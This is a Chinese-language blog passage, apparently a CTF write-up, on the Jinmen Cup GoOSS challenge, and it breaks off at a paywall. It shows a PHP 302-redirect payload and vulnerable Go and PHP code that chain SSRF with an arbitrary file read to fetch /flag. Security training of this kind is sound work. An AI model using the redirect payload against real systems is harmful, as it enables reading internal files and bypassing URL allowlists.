津门杯GoOSS和302重定向漏洞

最新推荐文章于 2024-05-20 14:28:21 发布
最新推荐文章于 2024-05-20 14:28:21 发布
阅读量750 收藏 1
点赞数 2
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45805993/article/details/116671017
版权

0x01.参考博客
https://evoa.me/archives/21/
这篇博客讲的一个类似的漏洞,而且比这题时间早很久,强烈怀疑出题人是参考的这个洞…
evoa大佬太强了

gin框架

0x02.题解在这里插入图片描述
xxxx的部分为我的vps,vps上的内容为

<?php
header("Location: http://127.0.0.1/index.php?file=/flag");
?>

0x03.题目分析

#index.php
<?php
// php in localhost port 80
readfile($_GET['file']);
?>

可以看出index.php中有readfile函数可以读取文件,但放在了80端口

func vulController(c *gin.Context) {
   

	var url Url
	if err := c.ShouldBindJSON(&url); err != nil {
   
		c.JSON(500, gin.H{
   "msg": err})
		return
	}

	if !strings.HasPrefix(url.Url,"http://127.0.0.1:1234/"){
   
		c.JSON(403, gin.H{
   "msg"
最低0.47元/天 解锁文章
ByNotD0g
关注
专栏目录
攻防世界杂项津门2021-m1
11-14
攻防世界杂项津门2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
BUU 302重定向、php代码审计、文件包含漏洞-[极客大挑战 2019]Secret File
Ivyyyyyy1的博客
10-17 3281
一、题目 碰到这种黑页面第一时间扒源代码 发现提示页面 ./Archive_room.php 点进去 果然还有一关,应该快了吧,点进SECRET 我 ********** 源代码里面啥都没了 二、解题 没事儿抓抓包,说不定有线索呢 这里我们用BP抓到了点击SECRET按钮时的包 可以看到这个包的Status是302,即它被重定向302重定向经常被用于做url劫持,黑帽seo技术中,而且百度在处理302重定向技术还不成熟,经常将它纳入到黑帽seo的范...
[JMCTF 2021]UploadHub
D.MIND 的博客
05-19 2000
主要看apache2.conf配置文件: <Directory ~ "/var/www/html/upload/[a-f0-9]{32}/"> php_flag engine off </Directory> php_flag engine off是会使整个目录不解析php的,所以上传php文件是行不通的 这题主要在配置上给我们限制了很多,而.htaccess就是可以修改配置的一个文件,恰好此题是可以上传.htaccess的(此题似乎并不做上传限制) 方法一 .ht
吾爱2023新年红包题第六题 (CTF)
热门推荐
Codeooo 博客
02-07 7万+
而且这里面还判断了key的长度,16位,正常key长度也是16位;上面这个 aWfkuqokj454836 15位,心态崩了,看来是假的,这个里面才是真的啊~~~~~~这几道题,完全就是整人玩,一个一直点999次,一个大喊大叫还说你是细狗,还得声音分贝大于100才解锁开始找flag;直接将这个 |wfkuqokj4548366 key 扔进去 get_RealKey方法,在比较的时候打断点,或者hook,拿到正确的可以;看伪C代码,memcmp比较, 是有个和真key比较的地方,返回bool;
gwb-crypto-1
zip471642048的博客
12-06 1219
crypto1 拿到题目直接base64 就是普通共模攻击,编写脚本直接秒杀。 import gmpy2 import libnum e1 = 667430104865289 e2 = 537409930523421 c1 = 65902678572727724179176496573968997182712063317082289120453094068199325419989688382177808529042322217887334005084504796397220804856167255176
buu-day08
anwen12的博客
01-05 604
又是早起刷题的一天 0x01 [FBCTF2019]Products Manager sql约束注入 在插入数据的时候,如果字段设置了应该插入的字符串长度,那么在添加的时候,如果有超过该长度的,就会被截断 mysql字符串比较 mysql == `mysql空格空格空格空格空格空格空格空格空格空格 可以看到sql的每个字段都进行了长度限制,并且在最后的位置并没有进行代码上的处理而是直接插入。所以,我们就可以开始操作了。 插入 name: facebook .
Bugku CTF flag.php WriteUp
Ta_ki
03-18 9018
Bugku CTF flag.php WriteUp 原题链接 flag.php 进去后第一反应是SQL注入得到flag,但是发现输入任何特殊字符点击Login都没有反应,查看源代码未发现异样。回到Bugku CTF界面,发现给了一个hint 提示给了一个hint,用户名密码输入hint没有反应,突然想到Get传参,传入参数 120.24.86.145:8002/flagph...
初中语文文摘历史徐光启屯田津门
09-09
他在天津的屯田活动,体现了他的农业实践理念和对国家经济的深思熟虑。屯田,即集中土地进行集体耕种,旨在解决粮食短缺和增强国防能力。在明万历四十一年(1613年),徐光启在天津开始实施这一计划,那时他52岁。...
WICCTF-2021-easypwn
05-12
2021津门ctf的第一道pwn题。
visio信息化设计实例富力津门湖溪畔云舒MDAS系统框图.zip
04-16
在压缩包中的文件“富力津门湖溪畔云舒MDAS系统框图.vsd”是Visio的绘图文件,它将展示整个MDAS系统的整体结构和组成部分,可能包括各个子系统、数据源、处理流程、用户界面、硬件设备、服务器集群等。通过这样的...
高中历史之历史百科大佬的黄昏:清末津门教案引发官场地震素材
09-09
1. 清末历史事件:清末津门教案是19世纪末期中国清朝发生的一起重大外交事件,涉及中法关系,反映了晚清时期中国社会与西方国家的冲突与矛盾。 2. 洋务运动背景:崇厚在津门推行洋务改革,包括设立对外机构、修订...
Python中类变量与成员变量相互影响的原因超详细解释
Ta_ki
01-07 8454
Python类变量与成员变量相互影响的原因超详细解释 今天看到了这样一篇文章:http://www.jb51.net/article/112525.htm 讲的是类变量和成员变量的影响原因,但原文并没有讲明详细原因,只是讲清楚了类变量与成员变量影响的结论,由于前几日看了《Python学习手册》这本书了解了一下Python的数据储存机制,然后自己想并且试验了一下,大致找到了原因,由于作者水平
dvwa靶场Open HTTP Redirect(开放重定向漏洞)全难度教程(附代码分析)
最新发布
m0_73248913的博客
05-20 739
本质是url转跳,叫url转跳漏洞也叫开放重定向漏洞,多用于钓鱼场景。重定向的类型:1.永久重定向状态码301和3082.临时重定向状态码302、303、3073.特殊重定向状态码300、304。
Java安全-Java In CTF([红明谷CTF 2021]JavaWeb、[红明谷CTF 2021]JavaWeb)
Love&Share
05-05 2341
文章目录[RoarCTF 2019]Easy Java[红明谷CTF 2021]JavaWeb [RoarCTF 2019]Easy Java 存在文件下载,尝试去读 WEB-INF/web.xml,get 传参发现一直失败 在 burp 中改为 post 传参,可以正常下载文件 只要再去读 class 文件即可 成功下载 class 放到 idea 中,拿到 flag [红明谷CTF 2021]JavaWeb 题目提示 /login 目录,访问提示 /json 访问 /json 跳回到 /lo.
*CTF2021部分题目解题思路及exp
liucc09的博客
01-18 3133
babyheap 这是pwn里面唯一的传统heap题,使用的是新的libc2.27,chunk被free到tcache后bk位置会被写入一个地址,再次free时如果bk有这个地址会和tcache里的所有chunk挨个比较,发现一样的就报double free tcache 2,因此要再free之后把bk置零就行了。 题目第一个坑,在edit方法里面读入数据是从chunk+8的位置的开始写,也就是不让修改fd,这导致虽然有UAF,也无法很方便的实现任意地址写。解决方法为构造重叠的chunk,从而改到tcach
2021.牛转乾坤.CTF公测赛-REVESE-wp
mcmuyanga的博客
02-12 497
CrackMe 例行检查,无壳儿,32位程序 运行一下程序,看看大概的情况 32位ida打开,我想检索字符串FALSE,找到关键函数,但是好像在字符串窗口找不到,去rdata段(资源数据段,程序用到什么资源数据都在这里)和data段(这个段存放程序的全局数据、全局常量等)找找看,最后让我在rdata段找到了‘FALSE’ ctrl+x找到引用它的函数 int __thiscall sub_401730(CWnd *this) { int v2; // edi HMODULE v3; //
2021-DASCTF-三月赛-Writeup
末初的CSDN博客
03-29 1万+
文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查 和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(Most Vegetable People) WEB 等复现环境出来了再写 MISC 签到 公众号语音识别:异世相遇!尽享美味!安恒赛高! 见笑了,偶四南方银,藕的普通话不镖准哈哈哈~ DASCTF{welcome_to_march_dasctf} 简单的png隐写 一开始以为hint.png是伪加密,flag.jpg是真加密,结果后
evoa java_主键为空问题
weixin_34052529的博客
02-27 145
com.jfinal.plugin.activerecord.ActiveRecordException:Youcan'tupdatemodelwithoutPrimaryKey,idcannotbenull.atcom.jfinal.plugin.activerecord.Model.update(Model.java:506)atcom.oss.model.Stoc...
跨域问题@CrossOrigin
binnnnnnn_的博客
01-05 177
【代码】跨域问题@CrossOrigin。Access to XMLHttpRequest at 'http://localhost:8001/eduuser/login' from origin 'http://localhost:9528' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' he
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值